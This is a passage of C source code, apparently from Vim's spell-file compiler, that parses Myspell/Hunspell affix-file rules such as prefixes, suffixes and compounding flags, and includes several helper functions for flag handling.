pc = string_convert(&spin->si_conv, rline, NULL);
if (pc == NULL)
{
smsg((char_u *)_("Conversion failure for word in %s line %d: %s"),
fname, lnum, rline);
continue;
}
line = pc;
}
else
#endif
{
pc = NULL;
line = rline;
}
/* Split the line up in white separated items. Put a NUL after each
* item. */
itemcnt = 0;
for (p = line; ; )
{
while (*p != NUL && *p <= ' ') /* skip white space and CR/NL */
++p;
if (*p == NUL)
break;
if (itemcnt == MAXITEMCNT) /* too many items */
break;
items[itemcnt++] = p;
/* A few items have arbitrary text argument, don't split them. */
if (itemcnt == 2 && spell_info_item(items[0]))
while (*p >= ' ' || *p == TAB) /* skip until CR/NL */
++p;
else
while (*p > ' ') /* skip until white space or CR/NL */
++p;
if (*p == NUL)
break;
*p++ = NUL;
}
/* Handle non-empty lines. */
if (itemcnt > 0)
{
if (is_aff_rule(items, itemcnt, "SET", 2) && aff->af_enc == NULL)
{
#ifdef FEAT_MBYTE
/* Setup for conversion from "ENC" to 'encoding'. */
aff->af_enc = enc_canonize(items[1]);
if (aff->af_enc != NULL && !spin->si_ascii
&& convert_setup(&spin->si_conv, aff->af_enc,
p_enc) == FAIL)
smsg((char_u *)_("Conversion in %s not supported: from %s to %s"),
fname, aff->af_enc, p_enc);
spin->si_conv.vc_fail = TRUE;
#else
smsg((char_u *)_("Conversion in %s not supported"), fname);
#endif
}
else if (is_aff_rule(items, itemcnt, "FLAG", 2)
&& aff->af_flagtype == AFT_CHAR)
{
if (STRCMP(items[1], "long") == 0)
aff->af_flagtype = AFT_LONG;
else if (STRCMP(items[1], "num") == 0)
aff->af_flagtype = AFT_NUM;
else if (STRCMP(items[1], "caplong") == 0)
aff->af_flagtype = AFT_CAPLONG;
else
smsg((char_u *)_("Invalid value for FLAG in %s line %d: %s"),
fname, lnum, items[1]);
if (aff->af_rare != 0
|| aff->af_keepcase != 0
|| aff->af_bad != 0
|| aff->af_needaffix != 0
|| aff->af_circumfix != 0
|| aff->af_needcomp != 0
|| aff->af_comproot != 0
|| aff->af_nosuggest != 0
|| compflags != NULL
|| aff->af_suff.ht_used > 0
|| aff->af_pref.ht_used > 0)
smsg((char_u *)_("FLAG after using flags in %s line %d: %s"),
fname, lnum, items[1]);
}
else if (spell_info_item(items[0]))
{
p = (char_u *)getroom(spin,
(spin->si_info == NULL ? 0 : STRLEN(spin->si_info))
+ STRLEN(items[0])
+ STRLEN(items[1]) + 3, FALSE);
if (p != NULL)
{
if (spin->si_info != NULL)
{
STRCPY(p, spin->si_info);
STRCAT(p, "\n");
}
STRCAT(p, items[0]);
STRCAT(p, " ");
STRCAT(p, items[1]);
spin->si_info = p;
}
}
else if (is_aff_rule(items, itemcnt, "MIDWORD", 2)
&& midword == NULL)
{
midword = getroom_save(spin, items[1]);
}
else if (is_aff_rule(items, itemcnt, "TRY", 2))
{
/* ignored, we look in the tree for what chars may appear */
}
/* TODO: remove "RAR" later */
else if ((is_aff_rule(items, itemcnt, "RAR", 2)
|| is_aff_rule(items, itemcnt, "RARE", 2))
&& aff->af_rare == 0)
{
aff->af_rare = affitem2flag(aff->af_flagtype, items[1],
fname, lnum);
}
/* TODO: remove "KEP" later */
else if ((is_aff_rule(items, itemcnt, "KEP", 2)
|| is_aff_rule(items, itemcnt, "KEEPCASE", 2))
&& aff->af_keepcase == 0)
{
aff->af_keepcase = affitem2flag(aff->af_flagtype, items[1],
fname, lnum);
}
else if ((is_aff_rule(items, itemcnt, "BAD", 2)
|| is_aff_rule(items, itemcnt, "FORBIDDENWORD", 2))
&& aff->af_bad == 0)
{
aff->af_bad = affitem2flag(aff->af_flagtype, items[1],
fname, lnum);
}
else if (is_aff_rule(items, itemcnt, "NEEDAFFIX", 2)
&& aff->af_needaffix == 0)
{
aff->af_needaffix = affitem2flag(aff->af_flagtype, items[1],
fname, lnum);
}
else if (is_aff_rule(items, itemcnt, "CIRCUMFIX", 2)
&& aff->af_circumfix == 0)
{
aff->af_circumfix = affitem2flag(aff->af_flagtype, items[1],
fname, lnum);
}
else if (is_aff_rule(items, itemcnt, "NOSUGGEST", 2)
&& aff->af_nosuggest == 0)
{
aff->af_nosuggest = affitem2flag(aff->af_flagtype, items[1],
fname, lnum);
}
else if ((is_aff_rule(items, itemcnt, "NEEDCOMPOUND", 2)
|| is_aff_rule(items, itemcnt, "ONLYINCOMPOUND", 2))
&& aff->af_needcomp == 0)
{
aff->af_needcomp = affitem2flag(aff->af_flagtype, items[1],
fname, lnum);
}
else if (is_aff_rule(items, itemcnt, "COMPOUNDROOT", 2)
&& aff->af_comproot == 0)
{
aff->af_comproot = affitem2flag(aff->af_flagtype, items[1],
fname, lnum);
}
else if (is_aff_rule(items, itemcnt, "COMPOUNDFORBIDFLAG", 2)
&& aff->af_compforbid == 0)
{
aff->af_compforbid = affitem2flag(aff->af_flagtype, items[1],
fname, lnum);
if (aff->af_pref.ht_used > 0)
smsg((char_u *)_("Defining COMPOUNDFORBIDFLAG after PFX item may give wrong results in %s line %d"),
fname, lnum);
}
else if (is_aff_rule(items, itemcnt, "COMPOUNDPERMITFLAG", 2)
&& aff->af_comppermit == 0)
{
aff->af_comppermit = affitem2flag(aff->af_flagtype, items[1],
fname, lnum);
if (aff->af_pref.ht_used > 0)
smsg((char_u *)_("Defining COMPOUNDPERMITFLAG after PFX item may give wrong results in %s line %d"),
fname, lnum);
}
else if (is_aff_rule(items, itemcnt, "COMPOUNDFLAG", 2)
&& compflags == NULL)
{
/* Turn flag "c" into COMPOUNDRULE compatible string "c+",
* "Na" into "Na+", "1234" into "1234+". */
p = getroom(spin, STRLEN(items[1]) + 2, FALSE);
if (p != NULL)
{
STRCPY(p, items[1]);
STRCAT(p, "+");
compflags = p;
}
}
else if (is_aff_rule(items, itemcnt, "COMPOUNDRULES", 2))
{
/* We don't use the count, but do check that it's a number and
* not COMPOUNDRULE mistyped. */
if (atoi((char *)items[1]) == 0)
smsg((char_u *)_("Wrong COMPOUNDRULES value in %s line %d: %s"),
fname, lnum, items[1]);
}
else if (is_aff_rule(items, itemcnt, "COMPOUNDRULE", 2))
{
/* Don't use the first rule if it is a number. */
if (compflags != NULL || *skipdigits(items[1]) != NUL)
{
/* Concatenate this string to previously defined ones,
* using a slash to separate them. */
l = (int)STRLEN(items[1]) + 1;
if (compflags != NULL)
l += (int)STRLEN(compflags) + 1;
p = getroom(spin, l, FALSE);
if (p != NULL)
{
if (compflags != NULL)
{
STRCPY(p, compflags);
STRCAT(p, "/");
}
STRCAT(p, items[1]);
compflags = p;
}
}
}
else if (is_aff_rule(items, itemcnt, "COMPOUNDWORDMAX", 2)
&& compmax == 0)
{
compmax = atoi((char *)items[1]);
if (compmax == 0)
smsg((char_u *)_("Wrong COMPOUNDWORDMAX value in %s line %d: %s"),
fname, lnum, items[1]);
}
else if (is_aff_rule(items, itemcnt, "COMPOUNDMIN", 2)
&& compminlen == 0)
{
compminlen = atoi((char *)items[1]);
if (compminlen == 0)
smsg((char_u *)_("Wrong COMPOUNDMIN value in %s line %d: %s"),
fname, lnum, items[1]);
}
else if (is_aff_rule(items, itemcnt, "COMPOUNDSYLMAX", 2)
&& compsylmax == 0)
{
compsylmax = atoi((char *)items[1]);
if (compsylmax == 0)
smsg((char_u *)_("Wrong COMPOUNDSYLMAX value in %s line %d: %s"),
fname, lnum, items[1]);
}
else if (is_aff_rule(items, itemcnt, "CHECKCOMPOUNDDUP", 1))
{
compoptions |= COMP_CHECKDUP;
}
else if (is_aff_rule(items, itemcnt, "CHECKCOMPOUNDREP", 1))
{
compoptions |= COMP_CHECKREP;
}
else if (is_aff_rule(items, itemcnt, "CHECKCOMPOUNDCASE", 1))
{
compoptions |= COMP_CHECKCASE;
}
else if (is_aff_rule(items, itemcnt, "CHECKCOMPOUNDTRIPLE", 1))
{
compoptions |= COMP_CHECKTRIPLE;
}
else if (is_aff_rule(items, itemcnt, "CHECKCOMPOUNDPATTERN", 2))
{
if (atoi((char *)items[1]) == 0)
smsg((char_u *)_("Wrong CHECKCOMPOUNDPATTERN value in %s line %d: %s"),
fname, lnum, items[1]);
}
else if (is_aff_rule(items, itemcnt, "CHECKCOMPOUNDPATTERN", 3))
{
garray_T *gap = &spin->si_comppat;
int i;
/* Only add the couple if it isn't already there. */
for (i = 0; i < gap->ga_len - 1; i += 2)
if (STRCMP(((char_u **)(gap->ga_data))[i], items[1]) == 0
&& STRCMP(((char_u **)(gap->ga_data))[i + 1],
items[2]) == 0)
break;
if (i >= gap->ga_len && ga_grow(gap, 2) == OK)
{
((char_u **)(gap->ga_data))[gap->ga_len++]
= getroom_save(spin, items[1]);
((char_u **)(gap->ga_data))[gap->ga_len++]
= getroom_save(spin, items[2]);
}
}
else if (is_aff_rule(items, itemcnt, "SYLLABLE", 2)
&& syllable == NULL)
{
syllable = getroom_save(spin, items[1]);
}
else if (is_aff_rule(items, itemcnt, "NOBREAK", 1))
{
spin->si_nobreak = TRUE;
}
else if (is_aff_rule(items, itemcnt, "NOSPLITSUGS", 1))
{
spin->si_nosplitsugs = TRUE;
}
else if (is_aff_rule(items, itemcnt, "NOCOMPOUNDSUGS", 1))
{
spin->si_nocompoundsugs = TRUE;
}
else if (is_aff_rule(items, itemcnt, "NOSUGFILE", 1))
{
spin->si_nosugfile = TRUE;
}
else if (is_aff_rule(items, itemcnt, "PFXPOSTPONE", 1))
{
aff->af_pfxpostpone = TRUE;
}
else if (is_aff_rule(items, itemcnt, "IGNOREEXTRA", 1))
{
aff->af_ignoreextra = TRUE;
}
else if ((STRCMP(items[0], "PFX") == 0
|| STRCMP(items[0], "SFX") == 0)
&& aff_todo == 0
&& itemcnt >= 4)
{
int lasti = 4;
char_u key[AH_KEY_LEN];
if (*items[0] == 'P')
tp = &aff->af_pref;
else
tp = &aff->af_suff;
/* Myspell allows the same affix name to be used multiple
* times. The affix files that do this have an undocumented
* "S" flag on all but the last block, thus we check for that
* and store it in ah_follows. */
vim_strncpy(key, items[1], AH_KEY_LEN - 1);
hi = hash_find(tp, key);
if (!HASHITEM_EMPTY(hi))
{
cur_aff = HI2AH(hi);
if (cur_aff->ah_combine != (*items[2] == 'Y'))
smsg((char_u *)_("Different combining flag in continued affix block in %s line %d: %s"),
fname, lnum, items[1]);
if (!cur_aff->ah_follows)
smsg((char_u *)_("Duplicate affix in %s line %d: %s"),
fname, lnum, items[1]);
}
else
{
/* New affix letter. */
cur_aff = (affheader_T *)getroom(spin,
sizeof(affheader_T), TRUE);
if (cur_aff == NULL)
break;
cur_aff->ah_flag = affitem2flag(aff->af_flagtype, items[1],
fname, lnum);
if (cur_aff->ah_flag == 0 || STRLEN(items[1]) >= AH_KEY_LEN)
break;
if (cur_aff->ah_flag == aff->af_bad
|| cur_aff->ah_flag == aff->af_rare
|| cur_aff->ah_flag == aff->af_keepcase
|| cur_aff->ah_flag == aff->af_needaffix
|| cur_aff->ah_flag == aff->af_circumfix
|| cur_aff->ah_flag == aff->af_nosuggest
|| cur_aff->ah_flag == aff->af_needcomp
|| cur_aff->ah_flag == aff->af_comproot)
smsg((char_u *)_("Affix also used for BAD/RARE/KEEPCASE/NEEDAFFIX/NEEDCOMPOUND/NOSUGGEST in %s line %d: %s"),
fname, lnum, items[1]);
STRCPY(cur_aff->ah_key, items[1]);
hash_add(tp, cur_aff->ah_key);
cur_aff->ah_combine = (*items[2] == 'Y');
}
/* Check for the "S" flag, which apparently means that another
* block with the same affix name is following. */
if (itemcnt > lasti && STRCMP(items[lasti], "S") == 0)
{
++lasti;
cur_aff->ah_follows = TRUE;
}
else
cur_aff->ah_follows = FALSE;
/* Myspell allows extra text after the item, but that might
* mean mistakes go unnoticed. Require a comment-starter. */
if (itemcnt > lasti && *items[lasti] != '#')
smsg((char_u *)_(e_afftrailing), fname, lnum, items[lasti]);
if (STRCMP(items[2], "Y") != 0 && STRCMP(items[2], "N") != 0)
smsg((char_u *)_("Expected Y or N in %s line %d: %s"),
fname, lnum, items[2]);
if (*items[0] == 'P' && aff->af_pfxpostpone)
{
if (cur_aff->ah_newID == 0)
{
/* Use a new number in the .spl file later, to be able
* to handle multiple .aff files. */
check_renumber(spin);
cur_aff->ah_newID = ++spin->si_newprefID;
/* We only really use ah_newID if the prefix is
* postponed. We know that only after handling all
* the items. */
did_postpone_prefix = FALSE;
}
else
/* Did use the ID in a previous block. */
did_postpone_prefix = TRUE;
}
aff_todo = atoi((char *)items[3]);
}
else if ((STRCMP(items[0], "PFX") == 0
|| STRCMP(items[0], "SFX") == 0)
&& aff_todo > 0
&& STRCMP(cur_aff->ah_key, items[1]) == 0
&& itemcnt >= 5)
{
affentry_T *aff_entry;
int upper = FALSE;
int lasti = 5;
/* Myspell allows extra text after the item, but that might
* mean mistakes go unnoticed. Require a comment-starter,
* unless IGNOREEXTRA is used. Hunspell uses a "-" item. */
if (itemcnt > lasti
&& !aff->af_ignoreextra
&& *items[lasti] != '#'
&& (STRCMP(items[lasti], "-") != 0
|| itemcnt != lasti + 1))
smsg((char_u *)_(e_afftrailing), fname, lnum, items[lasti]);
/* New item for an affix letter. */
--aff_todo;
aff_entry = (affentry_T *)getroom(spin,
sizeof(affentry_T), TRUE);
if (aff_entry == NULL)
break;
if (STRCMP(items[2], "0") != 0)
aff_entry->ae_chop = getroom_save(spin, items[2]);
if (STRCMP(items[3], "0") != 0)
{
aff_entry->ae_add = getroom_save(spin, items[3]);
/* Recognize flags on the affix: abcd/XYZ */
aff_entry->ae_flags = vim_strchr(aff_entry->ae_add, '/');
if (aff_entry->ae_flags != NULL)
{
*aff_entry->ae_flags++ = NUL;
aff_process_flags(aff, aff_entry);
}
}
/* Don't use an affix entry with non-ASCII characters when
* "spin->si_ascii" is TRUE. */
if (!spin->si_ascii || !(has_non_ascii(aff_entry->ae_chop)
|| has_non_ascii(aff_entry->ae_add)))
{
aff_entry->ae_next = cur_aff->ah_first;
cur_aff->ah_first = aff_entry;
if (STRCMP(items[4], ".") != 0)
{
char_u buf[MAXLINELEN];
aff_entry->ae_cond = getroom_save(spin, items[4]);
if (*items[0] == 'P')
sprintf((char *)buf, "^%s", items[4]);
else
sprintf((char *)buf, "%s$", items[4]);
aff_entry->ae_prog = vim_regcomp(buf,
RE_MAGIC + RE_STRING + RE_STRICT);
if (aff_entry->ae_prog == NULL)
smsg((char_u *)_("Broken condition in %s line %d: %s"),
fname, lnum, items[4]);
}
/* For postponed prefixes we need an entry in si_prefcond
* for the condition. Use an existing one if possible.
* Can't be done for an affix with flags, ignoring
* COMPOUNDFORBIDFLAG and COMPOUNDPERMITFLAG. */
if (*items[0] == 'P' && aff->af_pfxpostpone
&& aff_entry->ae_flags == NULL)
{
/* When the chop string is one lower-case letter and
* the add string ends in the upper-case letter we set
* the "upper" flag, clear "ae_chop" and remove the
* letters from "ae_add". The condition must either
* be empty or start with the same letter. */
if (aff_entry->ae_chop != NULL
&& aff_entry->ae_add != NULL
#ifdef FEAT_MBYTE
&& aff_entry->ae_chop[(*mb_ptr2len)(
aff_entry->ae_chop)] == NUL
#else
&& aff_entry->ae_chop[1] == NUL
#endif
)
{
int c, c_up;
c = PTR2CHAR(aff_entry->ae_chop);
c_up = SPELL_TOUPPER(c);
if (c_up != c
&& (aff_entry->ae_cond == NULL
|| PTR2CHAR(aff_entry->ae_cond) == c))
{
p = aff_entry->ae_add
+ STRLEN(aff_entry->ae_add);
mb_ptr_back(aff_entry->ae_add, p);
if (PTR2CHAR(p) == c_up)
{
upper = TRUE;
aff_entry->ae_chop = NULL;
*p = NUL;
/* The condition is matched with the
* actual word, thus must check for the
* upper-case letter. */
if (aff_entry->ae_cond != NULL)
{
char_u buf[MAXLINELEN];
#ifdef FEAT_MBYTE
if (has_mbyte)
{
onecap_copy(items[4], buf, TRUE);
aff_entry->ae_cond = getroom_save(
spin, buf);
}
else
#endif
*aff_entry->ae_cond = c_up;
if (aff_entry->ae_cond != NULL)
{
sprintf((char *)buf, "^%s",
aff_entry->ae_cond);
vim_regfree(aff_entry->ae_prog);
aff_entry->ae_prog = vim_regcomp(
buf, RE_MAGIC + RE_STRING);
}
}
}
}
}
if (aff_entry->ae_chop == NULL
&& aff_entry->ae_flags == NULL)
{
int idx;
char_u **pp;
int n;
/* Find a previously used condition. */
for (idx = spin->si_prefcond.ga_len - 1; idx >= 0;
--idx)
{
p = ((char_u **)spin->si_prefcond.ga_data)[idx];
if (str_equal(p, aff_entry->ae_cond))
break;
}
if (idx < 0 && ga_grow(&spin->si_prefcond, 1) == OK)
{
/* Not found, add a new condition. */
idx = spin->si_prefcond.ga_len++;
pp = ((char_u **)spin->si_prefcond.ga_data)
+ idx;
if (aff_entry->ae_cond == NULL)
*pp = NULL;
else
*pp = getroom_save(spin,
aff_entry->ae_cond);
}
/* Add the prefix to the prefix tree. */
if (aff_entry->ae_add == NULL)
p = (char_u *)"";
else
p = aff_entry->ae_add;
/* PFX_FLAGS is a negative number, so that
* tree_add_word() knows this is the prefix tree. */
n = PFX_FLAGS;
if (!cur_aff->ah_combine)
n |= WFP_NC;
if (upper)
n |= WFP_UP;
if (aff_entry->ae_comppermit)
n |= WFP_COMPPERMIT;
if (aff_entry->ae_compforbid)
n |= WFP_COMPFORBID;
tree_add_word(spin, p, spin->si_prefroot, n,
idx, cur_aff->ah_newID);
did_postpone_prefix = TRUE;
}
/* Didn't actually use ah_newID, backup si_newprefID. */
if (aff_todo == 0 && !did_postpone_prefix)
{
--spin->si_newprefID;
cur_aff->ah_newID = 0;
}
}
}
}
else if (is_aff_rule(items, itemcnt, "FOL", 2) && fol == NULL)
{
fol = vim_strsave(items[1]);
}
else if (is_aff_rule(items, itemcnt, "LOW", 2) && low == NULL)
{
low = vim_strsave(items[1]);
}
else if (is_aff_rule(items, itemcnt, "UPP", 2) && upp == NULL)
{
upp = vim_strsave(items[1]);
}
else if (is_aff_rule(items, itemcnt, "REP", 2)
|| is_aff_rule(items, itemcnt, "REPSAL", 2))
{
/* Ignore REP/REPSAL count */;
if (!isdigit(*items[1]))
smsg((char_u *)_("Expected REP(SAL) count in %s line %d"),
fname, lnum);
}
else if ((STRCMP(items[0], "REP") == 0
|| STRCMP(items[0], "REPSAL") == 0)
&& itemcnt >= 3)
{
/* REP/REPSAL item */
/* Myspell ignores extra arguments, we require it starts with
* # to detect mistakes. */
if (itemcnt > 3 && items[3][0] != '#')
smsg((char_u *)_(e_afftrailing), fname, lnum, items[3]);
if (items[0][3] == 'S' ? do_repsal : do_rep)
{
/* Replace underscore with space (can't include a space
* directly). */
for (p = items[1]; *p != NUL; mb_ptr_adv(p))
if (*p == '_')
*p = ' ';
for (p = items[2]; *p != NUL; mb_ptr_adv(p))
if (*p == '_')
*p = ' ';
add_fromto(spin, items[0][3] == 'S'
? &spin->si_repsal
: &spin->si_rep, items[1], items[2]);
}
}
else if (is_aff_rule(items, itemcnt, "MAP", 2))
{
/* MAP item or count */
if (!found_map)
{
/* First line contains the count. */
found_map = TRUE;
if (!isdigit(*items[1]))
smsg((char_u *)_("Expected MAP count in %s line %d"),
fname, lnum);
}
else if (do_mapline)
{
int c;
/* Check that every character appears only once. */
for (p = items[1]; *p != NUL; )
{
#ifdef FEAT_MBYTE
c = mb_ptr2char_adv(&p);
#else
c = *p++;
#endif
if ((spin->si_map.ga_len > 0
&& vim_strchr(spin->si_map.ga_data, c)
!= NULL)
|| vim_strchr(p, c) != NULL)
smsg((char_u *)_("Duplicate character in MAP in %s line %d"),
fname, lnum);
}
/* We simply concatenate all the MAP strings, separated by
* slashes. */
ga_concat(&spin->si_map, items[1]);
ga_append(&spin->si_map, '/');
}
}
/* Accept "SAL from to" and "SAL from to #comment". */
else if (is_aff_rule(items, itemcnt, "SAL", 3))
{
if (do_sal)
{
/* SAL item (sounds-a-like)
* Either one of the known keys or a from-to pair. */
if (STRCMP(items[1], "followup") == 0)
spin->si_followup = sal_to_bool(items[2]);
else if (STRCMP(items[1], "collapse_result") == 0)
spin->si_collapse = sal_to_bool(items[2]);
else if (STRCMP(items[1], "remove_accents") == 0)
spin->si_rem_accents = sal_to_bool(items[2]);
else
/* when "to" is "_" it means empty */
add_fromto(spin, &spin->si_sal, items[1],
STRCMP(items[2], "_") == 0 ? (char_u *)""
: items[2]);
}
}
else if (is_aff_rule(items, itemcnt, "SOFOFROM", 2)
&& sofofrom == NULL)
{
sofofrom = getroom_save(spin, items[1]);
}
else if (is_aff_rule(items, itemcnt, "SOFOTO", 2)
&& sofoto == NULL)
{
sofoto = getroom_save(spin, items[1]);
}
else if (STRCMP(items[0], "COMMON") == 0)
{
int i;
for (i = 1; i < itemcnt; ++i)
{
if (HASHITEM_EMPTY(hash_find(&spin->si_commonwords,
items[i])))
{
p = vim_strsave(items[i]);
if (p == NULL)
break;
hash_add(&spin->si_commonwords, p);
}
}
}
else
smsg((char_u *)_("Unrecognized or duplicate item in %s line %d: %s"),
fname, lnum, items[0]);
}
}
if (fol != NULL || low != NULL || upp != NULL)
{
if (spin->si_clear_chartab)
{
/* Clear the char type tables, don't want to use any of the
* currently used spell properties. */
init_spell_chartab();
spin->si_clear_chartab = FALSE;
}
/*
* Don't write a word table for an ASCII file, so that we don't check
* for conflicts with a word table that matches 'encoding'.
* Don't write one for utf-8 either, we use utf_*() and
* mb_get_class(), the list of chars in the file will be incomplete.
*/
if (!spin->si_ascii
#ifdef FEAT_MBYTE
&& !enc_utf8
#endif
)
{
if (fol == NULL || low == NULL || upp == NULL)
smsg((char_u *)_("Missing FOL/LOW/UPP line in %s"), fname);
else
(void)set_spell_chartab(fol, low, upp);
}
vim_free(fol);
vim_free(low);
vim_free(upp);
}
/* Use compound specifications of the .aff file for the spell info. */
if (compmax != 0)
{
aff_check_number(spin->si_compmax, compmax, "COMPOUNDWORDMAX");
spin->si_compmax = compmax;
}
if (compminlen != 0)
{
aff_check_number(spin->si_compminlen, compminlen, "COMPOUNDMIN");
spin->si_compminlen = compminlen;
}
if (compsylmax != 0)
{
if (syllable == NULL)
smsg((char_u *)_("COMPOUNDSYLMAX used without SYLLABLE"));
aff_check_number(spin->si_compsylmax, compsylmax, "COMPOUNDSYLMAX");
spin->si_compsylmax = compsylmax;
}
if (compoptions != 0)
{
aff_check_number(spin->si_compoptions, compoptions, "COMPOUND options");
spin->si_compoptions |= compoptions;
}
if (compflags != NULL)
process_compflags(spin, aff, compflags);
/* Check that we didn't use too many renumbered flags. */
if (spin->si_newcompID < spin->si_newprefID)
{
if (spin->si_newcompID == 127 || spin->si_newcompID == 255)
MSG(_("Too many postponed prefixes"));
else if (spin->si_newprefID == 0 || spin->si_newprefID == 127)
MSG(_("Too many compound flags"));
else
MSG(_("Too many postponed prefixes and/or compound flags"));
}
if (syllable != NULL)
{
aff_check_string(spin->si_syllable, syllable, "SYLLABLE");
spin->si_syllable = syllable;
}
if (sofofrom != NULL || sofoto != NULL)
{
if (sofofrom == NULL || sofoto == NULL)
smsg((char_u *)_("Missing SOFO%s line in %s"),
sofofrom == NULL ? "FROM" : "TO", fname);
else if (spin->si_sal.ga_len > 0)
smsg((char_u *)_("Both SAL and SOFO lines in %s"), fname);
else
{
aff_check_string(spin->si_sofofr, sofofrom, "SOFOFROM");
aff_check_string(spin->si_sofoto, sofoto, "SOFOTO");
spin->si_sofofr = sofofrom;
spin->si_sofoto = sofoto;
}
}
if (midword != NULL)
{
aff_check_string(spin->si_midword, midword, "MIDWORD");
spin->si_midword = midword;
}
vim_free(pc);
fclose(fd);
return aff;
}
/*
* Return TRUE when items[0] equals "rulename", there are "mincount" items or
* a comment is following after item "mincount".
*/
static int
is_aff_rule(
char_u **items,
int itemcnt,
char *rulename,
int mincount)
{
return (STRCMP(items[0], rulename) == 0
&& (itemcnt == mincount
|| (itemcnt > mincount && items[mincount][0] == '#')));
}
/*
* For affix "entry" move COMPOUNDFORBIDFLAG and COMPOUNDPERMITFLAG from
* ae_flags to ae_comppermit and ae_compforbid.
*/
static void
aff_process_flags(afffile_T *affile, affentry_T *entry)
{
char_u *p;
char_u *prevp;
unsigned flag;
if (entry->ae_flags != NULL
&& (affile->af_compforbid != 0 || affile->af_comppermit != 0))
{
for (p = entry->ae_flags; *p != NUL; )
{
prevp = p;
flag = get_affitem(affile->af_flagtype, &p);
if (flag == affile->af_comppermit || flag == affile->af_compforbid)
{
STRMOVE(prevp, p);
p = prevp;
if (flag == affile->af_comppermit)
entry->ae_comppermit = TRUE;
else
entry->ae_compforbid = TRUE;
}
if (affile->af_flagtype == AFT_NUM && *p == ',')
++p;
}
if (*entry->ae_flags == NUL)
entry->ae_flags = NULL; /* nothing left */
}
}
/*
* Return TRUE if "s" is the name of an info item in the affix file.
*/
static int
spell_info_item(char_u *s)
{
return STRCMP(s, "NAME") == 0
|| STRCMP(s, "HOME") == 0
|| STRCMP(s, "VERSION") == 0
|| STRCMP(s, "AUTHOR") == 0
|| STRCMP(s, "EMAIL") == 0
|| STRCMP(s, "COPYRIGHT") == 0;
}
/*
* Turn an affix flag name into a number, according to the FLAG type.
* returns zero for failure.
*/
static unsigned
affitem2flag(
int flagtype,
char_u *item,
char_u *fname,
int lnum)
{
unsigned res;
char_u *p = item;
res = get_affitem(flagtype, &p);
if (res == 0)
{
if (flagtype == AFT_NUM)
smsg((char_u *)_("Flag is not a number in %s line %d: %s"),
fname, lnum, item);
else
smsg((char_u *)_("Illegal flag in %s line %d: %s"),
fname, lnum, item);
}
if (*p != NUL)
{
smsg((char_u *)_(e_affname), fname, lnum, item);
return 0;
}
return res;
}
/*
* Get one affix name from "*pp" and advance the pointer.
* Returns zero for an error, still advances the pointer then.
*/
static unsigned
get_affitem(int flagtype, char_u **pp)
{
int res;
if (flagtype == AFT_NUM)
{
if (!VIM_ISDIGIT(**pp))
{
++*pp; /* always advance, avoid getting stuck */
return 0;
}
res = getdigits(pp);
}
else
{
#ifdef FEAT_MBYTE
res = mb_ptr2char_adv(pp);
#else
res = *(*pp)++;
#endif
if (flagtype == AFT_LONG || (flagtype == AFT_CAPLONG
&& res >= 'A' && res <= 'Z'))
{
if (**pp == NUL)
return 0;
#ifdef FEAT_MBYTE
res = mb_ptr2char_adv(pp) + (res << 16);
#else
res = *(*pp)++ + (res << 16);
#endif
}
}
return res;
}
/*
* Process the "compflags" string used in an affix file and append it to
* spin->si_compflags.
* The processing involves changing the affix names to ID numbers, so that
* they fit in one byte.
*/
static void
process_compflags(
spellinfo_T *spin,
afffile_T *aff,
char_u *compflags)
{
char_u *p;
char_u *prevp;
unsigned flag;
compitem_T *ci;
int id;
int len;
char_u *tp;
char_u key[AH_KEY_LEN];
hashitem_T *hi;
/* Make room for the old and the new compflags, concatenated with a / in
* between. Processing it makes it shorter, but we don't know by how
* much, thus allocate the maximum. */
len = (int)STRLEN(compflags) + 1;
if (spin->si_compflags != NULL)
len += (int)STRLEN(spin->si_compflags) + 1;
p = getroom(spin, len, FALSE);
if (p == NULL)
return;
if (spin->si_compflags != NULL)
{
STRCPY(p, spin->si_compflags);
STRCAT(p, "/");
}
spin->si_compflags = p;
tp = p + STRLEN(p);
for (p = compflags; *p != NUL; )
{
if (vim_strchr((char_u *)"/?*+[]", *p) != NULL)
/* Copy non-flag characters directly. */
*tp++ = *p++;
else
{
/* First get the flag number, also checks validity. */
prevp = p;
flag = get_affitem(aff->af_flagtype, &p);
if (flag != 0)
{
/* Find the flag in the hashtable. If it was used before, use
* the existing ID. Otherwise add a new entry. */
vim_strncpy(key, prevp, p - prevp);
hi = hash_find(&aff->af_comp, key);
if (!HASHITEM_EMPTY(hi))
id = HI2CI(hi)->ci_newID;
else
{
ci = (compitem_T *)getroom(spin, sizeof(compitem_T), TRUE);
if (ci == NULL)
break;
STRCPY(ci->ci_key, key);
ci->ci_flag = flag;
/* Avoid using a flag ID that has a special meaning in a
* regexp (also inside []). */
do
{
check_renumber(spin);
id = spin->si_newcompID--;
} while (vim_strchr((char_u *)"/?*+[]\\-^", id) != NULL);
ci->ci_newID = id;
hash_add(&aff->af_comp, ci->ci_key);
}
*tp++ = id;
}
if (aff->af_flagtype == AFT_NUM && *p == ',')
++p;
}
}
*tp = NUL;
}
/*
* Check that the new IDs for postponed affixes and compounding don't overrun
* each other. We have almost 255 available, but start at 0-127 to avoid
* using two bytes for utf-8. When the 0-127 range is used up go to 128-255.
* When that is used up an error message is given.
*/
static void
check_renumber(spellinfo_T *spin)
{
if (spin->si_newprefID == spin->si_newcompID && spin->si_newcompID < 128)
{
spin->si_newprefID = 127;
spin->si_newcompID = 255;
}
}
/*
* Return TRUE if flag "flag" appears in affix list "afflist".
*/
static int
flag_in_afflist(int flagtype, char_u *afflist, unsigned flag)
{
char_u *p;
unsigned n;
switch (flagtype)
{
case AFT_CHAR:
return vim_strchr(afflist, flag) != NULL;
case AFT_CAPLONG:
case AFT_LONG:
for (p = afflist; *p != NUL; )
{
#ifdef FEAT_MBYTE
n = mb_ptr2char_adv(&p);
#else
n = *p++;
#endif
if ((flagtype == AFT_LONG || (n >= 'A' && n <= 'Z'))
&& *p != NUL)
#ifdef FEAT_MBYTE
n = mb_ptr2char_adv(&p) + (n << 16);
#else
n = *p++ + (n << 16);
#endif
if (n == flag)
return TRUE;
}
break;
case AFT_NUM:
for (p = afflist; *p != NUL; )
{
n = getdigits(&p);
if (n == flag)
return TRUE;
if (*p != NUL) /* skip over comma */
++p;
}
break;
}
return FALSE;
}
/*
* Give a warning when "spinval" and "affval" numbers are set and not the same.
*/
static void
aff_check_number(int spinval, int affval, char *name)
{
if (spinval != 0 && spinval != affval)
smsg((char_u *)_("%s value differs from what is used in another .aff file"), name);
}
/*
* Give a warning when "spinval" and "affval" strings are set and not the same.
*/
static void
aff_check_string(char_u *spinval, char_u *affval, char *name)
{
if (spinval != NULL && STRCMP(spinval, affval) != 0)
smsg((char_u *)_("%s value differs from what is used in another .aff file"), name);
}
/*
